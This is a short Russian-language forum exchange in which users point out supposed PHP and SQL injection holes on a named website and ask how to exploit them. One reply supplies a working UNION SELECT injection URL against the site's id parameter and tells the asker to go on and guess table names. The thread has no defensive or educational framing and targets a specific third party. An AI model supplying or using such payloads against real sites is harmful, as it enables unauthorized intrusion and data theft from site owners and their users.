На этом сайте найдены http://www.generis.ru/ потенциальная php-inj http://www.generis.ru/?page=qwe и потенциальная sql-inj http://www.generis.ru/?page=press_wholenews&id=qwe Вот я нашел уязвимости, как ими можно воспользоваться?
SQL-inj красава =)) пхп-инъекции к сожалению там нет... если толкьо локальных html-страничек.. но это ничего не даст..
Да, там скуль инъекция http://www.generis.ru/?page=press_wholenews&id=-1+union+select+1,'blablabla',3,4,5,6/* Далее подбирай таблицы